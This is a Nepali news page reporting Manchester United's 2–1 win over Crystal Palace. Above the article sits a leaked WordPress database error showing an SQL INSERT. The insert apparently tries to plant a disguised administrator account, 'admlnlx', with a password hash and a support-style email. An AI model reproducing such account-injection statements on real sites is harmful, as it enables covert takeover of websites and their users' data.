WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Ba9oLc4d.G/z9gXli3h9lsOnURpDt2.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 13:57:42', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर ३०–
म्यानचेस्टर युनाइटेडले इंग्लिस प्रिमियर लिगमा गएराति संघर्षपूर्ण जीत दर्ता गरेको छ। लगातार दोस्रो जित दर्ता गर्नेक्रममा युनाइटेडले बुधबार राति क्रिष्टल प्यालेसलाई २–१ ले हराएको हो। युनाइटेडको जीतमा पउल पोग्बा र जाल्टन इब्राहिमोविचले एक एक गोल गरेका थिए। क्रिष्टल प्यालेसका लागि जेम्स म्याकअ्रथरले एक गोल फर्काए।
पहिलो हाफको इन्जुरी समयमा पोग्बाले गोल गर्दै युनाइटेडलाई सुरुवाति अग्रता दिलाए । तर ६६ औं मिनेटमा म्याकअ्रथरले क्रिष्टल प्यालेसका लागि बराबरी गोल फर्काए । बराबरीमा रोकिन पुगेको अवस्थामा म्यानचेस्टर युनाइटेडका लागि खेल सकिन दुई मिनेट बाँकी हुँदा इब्राहिमोविचले गोल गरेर महत्वपूर्ण जित दिलाएका हुन्।